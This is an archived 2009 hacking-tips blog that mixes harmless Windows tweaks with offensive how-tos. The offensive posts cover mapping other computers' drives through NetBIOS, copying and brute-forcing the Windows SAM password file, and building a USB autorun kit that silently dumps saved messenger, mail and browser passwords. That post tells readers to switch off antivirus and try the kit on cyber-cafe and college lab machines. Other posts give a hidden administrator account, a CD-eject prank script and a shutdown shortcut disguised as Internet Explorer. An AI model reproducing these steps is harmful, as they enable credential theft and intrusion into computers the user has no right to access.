Tuesday, November 10, 2009

SECURE YOURSELF

Hello friends !!! Still now I have told about hacking and cracking. All the tricks posted in this blog are only for educational purpose. If you know how a virus infects, how a hacker penetrates into a system, how an attacker steals your private data, then you must defend them all. This is what www.xtrmhack.com is trying to provide. Its ambition is nothing but to provide security. Today I will give you guys some security tips which you must adopt for securing your system, for securing yourself.



1. Run Windows Update at least once a week to patch your system against the latest vulnerabilities, loopholes and exploits.

2. Use a strong password.It should be a combination of alphabets, numbers and special characters in order to prevent brute force attack.

3. Your password should not be a word that appears in the dictionary in order to prevent dictionary attack.

4. Your password should be changed regularly and it should not be repeated in multiple places.

5. Install some good Anti-virus software (like Kaspersky, Avira, McAfee, Norton, AVG) and update its virus definition files at least once in a week to ward off latest viruses, worms and trojans.

6. Install a firewall (like ZoneAlarm) on your system.This keeps you notified of any live attacks, malicious data or probes.

7. Install Anti-spyware tool on your computer which will detect and remove any spyware tools on your computer.

8. Try to connect to the Internet only after connecting to a proxy server.Stay anonymous while surfing the Internet.

9. Use care when reading Email sent from unknown source.Email attachments must be scanned before downloading.

10.Use care when downloading and installing programs from restricted sites or those sites which you don't trust.

Hope the information will be helpful to you...So secure yourself before the attack...Have fun :-)


Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

NETBIOS HACKING

Hello friends...Hope you guys are enjoying my previous posts on XP hacking...Now I will show you how to hack a remote computer and gain access to its hard disk and printer...This technique is called NetBIOS Hacking...NetBIOS stands for Network Basic Input Output System...It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources...By default it runs on port 139...Ok, let's start NetBIOS :-)

1. Goto "start" and click "Run"...



2. Type "cmd" and click "Ok"...the Command Prompt will appear...



3. First use "nbtstat" command for manually interact with NetBIOS Over TCP/IP...All the attributes (switches) used with nbtstat command and their usage can be viewed...

Syntax: C:\>nbtstat -n



An intruder could use the output from an nbtstat against your machines to begin gathering information about them...Here 192.168.110.29 is an IP address of remote computer and <20> is nothing but the username of that system...

4. Now in the command prompt use "
net view" command....It is one of the netbios commands to view the shared resources of the remote computer...Syntax: C:\>net view \\192.168.110.29

If succeeded a list of HARD-DISK DRIVES and PRINTERS are shown with the massage "The command was completed successfully"...

5. Now use the "
net use" command in the command prompt...This command enables a computer to map a share to its local drive...Syntax: C:\>net use E: \\192.168.110.29\C
Syntax: C:\>net use F: \\192.168.110.29\Myprint
Syntax: C:\>net use G: \\192.168.110.29\SharedDocs

Here E, F AND G are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk...And C, SharedDocs are the names of remote computer’s hard-disk drives that you want to hack..."Myprint" is the name of remote computer’s printer...

6. After succeeding your computer will give a message that "The command completed successfully"...Now open "My Computer" you will see a new "Hard-Disk drive" (Shared) with the specified name...You can open it and access remote computer’s Hard-Drive...
Note: You can scan your network computers with a network scanner...I personally used Angry IP Scanner...It scans IP addresses and ports as well as has many other features...Download the scanner from HERE and find the live hosts...If you face any problem just post your comment...


Note: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios. 

Happy Hacking...Enjoy...
For educational purpose only...Do not misuse it...

HIDDEN ACCOUNT

Hello friends...Hope you guys enjoyed my post on website blocking...Now I will show you how to create a hidden account in Windows XP...This hidden account is invisible in User Account panel, as well as in Log on screen...It can be achieved using a simple registry trick...This trick will give you a good privacy in a multi-user system...Just follow the following steps carefully...

1. Goto "start", then goto "Control Panel", next "User Accounts"...



2. Click "Create a new account"...Make sure that you are picking an account type as "Computer administrator"...Your new account will be created, i.e Extreme Hacker...Now I will show you how to hide this account...

3. Goto "start" and click "Run"...



4. Type "regedit" and click "Ok"...the Registry Editor will appear...



5. In registry editor goto:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

6. At right side create a new "DWORD value"...Rename it the account you created i.e Extreme Hacker...Now set the "Value data" as 0...Click "Ok"...



7. Reboot your system...At Log on screen, press alt+ctrl+del twice...A new window will appear...Put the hidden account name and password (if needed) there and log in...

You are done...Your account is now hidden...Enjoy your privacy :-)

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

BLOCK A WEBSITE

Hello friends...Hope you guys enjoyed my post on CD-ROM Virus...Now I will show you how to block a website in Internet Explorer...The following instructions are for blocking malicious and unwanted websites in all versions of Internet Explorer...You can block inappropriate websites for certain people, especially children...

1. Open "Internet Explorer"...In the Menubar click "Tools", select "Internet Options", click "Content" tab..."Internet Options" dialog box will appear...



2. In the "Content Advisor" box, click "Enable"...Click the "Approved Sites" tab... Enter the address of the website in "Allow this website" box, i.e www.google.com...Click "Never"...



3. Click on the "General" tab and in "Supervisor password" box, click "Change password"...



4. Enter a password, confirm it...You can put a hint to remember it easily...



5. Click "Ok"...Restart the "Internet Explorer"...Try to open Google and you will be asked for the password...



You are done......Safely surf the internet through IE :-)

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

CD-ROM VIRUS

Hello friends...Hope you are enjoying my posts...Today I will show you guys how to make CD-ROM Virus in Windows XP...This is basically a VB Script which instructs to open and close your CD-ROM continuously...Remember, it is not deadly or dangerous and you can use it without any hesitation...This virus is awesome for playing pranks with your friends...I am sure you will love this...Just follow the steps carefully...



1. First copy the following code paste into a notepad...

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection

if colCDROMs.Count >= 1 then
do

For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom

For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom

loop
End If


2. Then save this file as anyname with the extension ".vbs", i.e "CD-ROM VIRUS.vbs"...

3. Then double click on the vbs file you just created and see the magic...

Testing: You can test this virus on your own computer...Now if you want to disable this virus, goto Task Manager click on "Processes", then select "wscript.exe" and click "End Process"...



You are done...Now play pranks with your friends...Have fun :-)

Note: If you face any problem with the above process, just download the file from HERE and test it...I have coverted the VB Script into exe format...Don't forget to post your comment...

Extract the file using WinRAR.
Password: xtrmhack.blogspot.com

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

Sunday, November 8, 2009

FASTER STARTUP

Hello friends...In my previous post I showed you guys how to make the shutdown faster...Now I will show you how to make a faster startup...You can also do it manually...

1. Goto "start" and click "Run"...



2. Type "msconfig" and click "Ok"...the "System Configuration Utility" will appear...



3. Click "Startup" tab...Click "Disable All" tab...Click "Apply"...



4. Then click "Services" tab...Check the "Hide All Microsoft Service" box...Click "Disable All" tab...Click "Apply"...Close the window...



5. Click "Restart" and Windows XP will restart with only the system services and applications running resulting in a faster startup.

You are done...Enjoy your faster XP :-)

Note: You can remove those items from MSConfig which you have just disabled...Just follow the following steps:
1. Download "MSConfig Cleanup" from HERE.

Extract the file using WinRAR.
Password: xtrmhack.blogspot.com

2. Install and Run the program.
3. Press "Clean Up Selected".Press "Quit".You are done.

Note: This tweak will disable all non-system startup sevices and applications so if you have anything you want to run in the background such as Anti-Virus software do not disable that item.

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

FASTER SHUTDOWN

Hello friends...I hope you guys are enjoying my posts on Windows XP tips and tricks...Today I will show show you how to make the shutdown faster...It requires some registry tricks...Do it by yourself...

1. Goto "start" and click "Run"...



2. Type "regedit" and click "Ok"...the Registry Editor will appear...



3. In registry editor goto:

HKEY_CURRENT_USER\Control Panel\Desktop

4. Double click on the "AutoEndTasks" entry and replace the 0 with a 1 in the Value data text box.



5. Double click on the "WaitToKillAppTimeout" entry in the right pane and change the Value data to 2000.



6. Double click on the "HungAppTimeout" entry in the right pane and change the Value data to 1000.



7. Again in the registry editor goto:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

8. Right-click on "WaitToKillServiceTimeout" and change it to 2000.

You are done...Your shutdown speed is faster now...Have fun :-)

Note: The lowest value Windows will recognize is 1000 (1 second).

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

INCREASE VIRTUAL MEMORY

Hello friends...I hope you liked my post on locking a folder without any software...Now I will show you guys how to increase the Virtual Memory and make your system faster...Hope you will enjoy...

For computer users that multi-task or work with high performance applications, you should know about virtual memory and how to get the most from it. Virtual memory can be best described as simulated RAM. If your computer has 1 GB of RAM and you use up all of this memory with the OS and several applications, your computer is forced to compensate by switching from physical RAM to virtual memory. Without virtual memory, once your computer ran out of physical RAM, no other programs or higher performance could be possible.With virtual memory, the computer copies data from the RAM and writes it to the hard drive- essentially freeing up RAM and allowing you to open additional applications or allow a high performance application to run uninhibited.



However, the downside of virtual memory is that since virtual memory is copied to your hard drive and your hard drive is much slower than physical RAM, the user will notice a significant decrease in performance. If you would like to increase performance, there are a few things you can do. Here is a trick to increase virtual memory for both Windows XP and Vista.

1. To invoke the system properties dialog, click the Start button, right-click "My Computer" and select "Properties".This will open up your general system information dialog.



2. Click "Advanced" tab, then under "Performance", click "Settings".



3. "Performance Options" dialog box will appear...Click on "Advanced" tab...Then under "Virtual memory", click "Change".



4. Under "Drive [Volume Label]", click the drive that contains the paging file that you want to change.Under Paging file size for selected drive, check "Custom size" box. You can enter the amount of memory you would like to reserve for Virtual memory by entering the initial and maximum size.Click "Set".



Note: You should choose the same amount for the initial size and maximum size.This will Stop your CPU from constantly changing the paging file.

You are done...Your system is faster now...Have fun :-)

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

FOLDER LOCK

Hello friends...Hope you guys are enjoying my posts on Windows XP tricks...Today I will show you how to lock your folder, i.e to make your folder password-protected without any kind of software...It is possible by using some registry tricks...This trick will be very useful for those who need privacy in a multi-user system...So enjoy...

1. First copy the following code paste into a notepad...

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure you want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


2. Now you can see "type your password here" in the 23rd line of the code...Delete that and type your own password there...

3. Save this file with any name and the file extension should be ".bat"...

4. Now double click the batch file...It will create a folder named "Locker"...Put the files in that folder which you want to lock...

5. Now double click on the batch file to lock the folder...Dos prompt will appear, asking "Are you sure you want to lock the folder"...



6. Press "Y" followed by "Enter"...The folder is locked now...

7. Now if you want to unlock the folder double click that batch file again...The dos prompt will appear, asking for the password...Put the correct password followed by Enter...Your "Locker" is now opened to you...



You are done...Your privacy is now in your hand...Have fun :-)

Note:
1. Don't delete the batch file.
2. Don't rename the folder "Locker".

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

Friday, November 6, 2009

CRACK THE SAM

Hello friends...I have posted topics on windows xp password cracking...Now it's time to hack, i.e to get the admin password without altering it...Hope you guys will enjoy it...

This method takes three steps:

1. First what is SAM file???All of the passwords on a windows xp are stored in a SAM(Security Accounts Manager) file...This file is located on your computer’s hard drive in the directory "C:\WINDOWS\system32\config".It stores user's passwords in a hashed format (in LM hash and NTLM hash).The SAM file cannot be moved or copied while Windows is running, since the Windows kernel obtains and keeps an exclusive filesystem lock on the SAM file.



2. Second how to obtain the SAM file???To obtain this SAM file, boot your system with a Live CD(Puppy Linux/Ubuntu)...Nevigate to the config folder and take a copy of SAM file in another drive...

Note: Download one of the versions of Puppy Linux iso file from HERE and burn the iso file...Your live cd is ready...Puppy Linux 4.3.1 is the latest one:



3. Third how to crack the SAM file???Now use some password cracking softwares like SAMinside or Lophtcrack(LC5) in order to decrypt the hash file...This is basically a bruteforce attack...It may take several minutes...All the passwords will be shown as NT-Password as shown in figure...



You are done...Reboot your system and login your admin account with the password you already hacked...

Note: I personally used SAMinside...It's simple and works perfect...Download the cracker from HERE and crack the SAM file...If you face any problem just post your comment...

Extract the file using WinRAR.
Password: xtrmhack.blogspot.com


Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

HACK USING PENDRIVE

Hello friends...Hope you guys are enjoying the tips and tricks on Windows XP...Today I will show you how to hack passwords using pendrive...Enjoy :-)



Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE,Firefox and Google Chrome.There are some online available tools for recovering these passswords from their stored places.They are generally known as Windows Password Recovery Tools.Using these tools and an USB pendrive you can sniff those stored passwords from any computer.A brief description of these tools are given below:

MessenPass

Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Note: Download MessenPass from HERE.


Mail PassView

Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

Note: Download MessenPass from HERE.


IE PassView

IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0.

Note: Download MessenPass from HERE.


PasswordFox

PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Note: Download MessenPass from HERE.


ChromePass

ChromePass is a small password recovery tool that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time. You can select one or more items and then save them into text/html/xml file or copy them to the clipboard.

Note: Download MessenPass from HERE.


Now you have the 5 password recovery tools...These tools are detected by modern Anti-virus software...That's why you should temporarily disable your Anti-virus...If you are done, follow the steps carefully:

1. Copy the files – mspass.exe, mailpv.exe, iepv.exe, chromePass.exe and passwordfox.exe into your USB Drive.

2. Create below two files by writing the below codes in a text file and changing the extension as autorun.inf and Hack Password.bat.

  • autorun.inf
[autorun] open=launch.bat
ACTION= Perform a Virus Scan


  • Hack Password.bat
start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start chromePass.exe /stext chromePass.txt
start passwordfox.exe /stext passwordfox.txt
  

Now save the two files into your USB Drive.You are done :-)

3. Insert the pendrive and the autorun window will pop-up.Select the first option: Perform a Virus Scan

4. Now all the password recovery tools will silently get executed in the background The passwords get stored in automatically generated 5 text files.

Now you have a list of passwords in your pendrive...Try this trick in any cyber cafe or your college computer lab...This will produce a massive collection of passwords...Have fun...If you face any problem with the above process, post your comment...


Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

Thursday, November 5, 2009

TASK MANAGER DISABLED

Hello friends...Hope you guys are enjoying the tips and tricks on Windows XP...Today I will show you how to get rid of virus...If you know the mechanism of the virus, i.e the files they corrupt, the registry-settings they change, the places where they hide themselves etc, then you can manually detect and delete them ...You need not have to depend on your Anti-virus software :-)

I often see people suffering from the effects of the age-old but irritating viruses...Someone says that his Task Manager has been disabled as he is getting the error like:



And someone says that his Registry Editor has been disabled as he is getting the error like:



Now here is the solution...Follow the steps carefully and manually recover your system...

1. Goto "start" and click "Run"...



2. Type "gpedit.msc" and click "Ok"...the "Group Policy" dialog box will appear...



3. Navigate to "User Configuration", then "Administrative Templates", then "System"...



4. At right side open "Ctrl+Alt+Del Options", then open "Remove Task Manager"...

5. In the dialog box check "Not Configured" and click "Ok".



6. To recover Registry Editor, goto step 3...At the right side open "Prevent access to registry editing tool"...A dialog box will appear...

7. Check "Not Configured" and click "Ok"...Close "Group Policy" dialog box...



You are done...Now open your Task Manager and Registry Editor...

Note: If you face any problem with the above process, just download the file from HERE and just open it...Now check "Enable Taskmanager" and click "Apply"...You are done...Don't forget to post your comment...

Extract the file using WinRAR.
Password: xtrmhack.blogspot.com

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

LOCK SPECIFIC DRIVES

Hello friends...Hope you guys are enjoying the tips and tricks on Windows XP...Now I will show you how to block access to specific drives in XP...This is possible and there is no need to install any kind of software...Just follow the steps carefully and do it by yourself...You can play pranks with your friends with this trick...

1. Goto "start" and click "Run"...



2. Type "regedit" and click "Ok"...the Registry Editor will appear...



3. In registry editor goto:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

4. In the right panel create a new "DWORD" value.Rename it as "NoViewOnDrive" and open it.



5. Check the "Base" as "Decimal" and set its data value to the number of the drive that you want to hide as per the below list:

A:1 B:2 C:4 D:8 E:16 F:32 G:64 H:128 I:256 J:512 K:1024 L:2048 M:4096 N:8192 O:16384 P:32768 Q:65536 R:131072 S:262144 T:524288 U:1048576 V:2097152 W:4194304 X:8388608 Y:16777216 Z:33554432 ALL:67108863



6. After putting the desired decimal value, click "Ok" and close the registry.

7. Reboot you system...Try to open the drive , you just locked and get the error:



You are done...You have successfully locked your drive...

Note: If you face any problem with the above process, just download the file from HERE and just open it...I've made this reg file to lock C drive...You can modify the file to lock other drives...just open the file with notepad and edit the decimal value ...Don't forget to post your comment...

Extract the file using WinRAR.
Password: xtrmhack.blogspot.com


Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...

Wednesday, November 4, 2009

A FAKE VIRUS

Hello friends...Today I will show you guys how to make a fake virus in Windows XP...This is fake because it pretends to be a virus, but actually it's not...It actually shuts your system down normally...This method needs a little Social Engineering...I am sure you will love this...Just follow the steps carefully and play pranks with your friends :-)

1. The first step to a your one click shutdown shortcut button, is to right-click on your desktop, now choose "New", then choose "Shortcut". The Windows Shortcut Wizard will appear.



2. In the box that appears, in the "location of shortcut area" type:

shutdown -s -t 10 -c "Trojan activated...u r terminated :)"

then click "Next"...

3. Now in "Type a name" field type "Internet Explorer" and click "Finish".



4. A shortcut dialog box of Internet Explorer will be there on your desktop...Goto it's "Properties" and click on "Change Icon".Another dialog box will appear.Click "Ok".



5. From the "Change Icon" dialog box, select the Internet Explorer icon and click "Ok".



6. Now you will see a icon on your desktop exactly same as "Internet Explorer".



You are done...Let your friend open the Internet Explorer...Have fun :-)

Before the experiment,you should do two things:

1. Goto "My Computer", then "Tools", Then "Folder Options", then "View".Check "Hide extensions for known file types" and apply the settings.



2. If there is any "Internet Explorer" origilal icon, delete that.

TESTING: You can test this virus by double clicking the icon...But you can stop the system from shutting down...Just goto "Run" and type:

shutdown -a

and click "Ok"...It will abort the shutdown...

Note: If you face any problem with the above process, just download the file from HERE and test it...Don't forget to post your comment...

Extract the file using WinRAR.
Password: xtrmhack.blogspot.com

Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...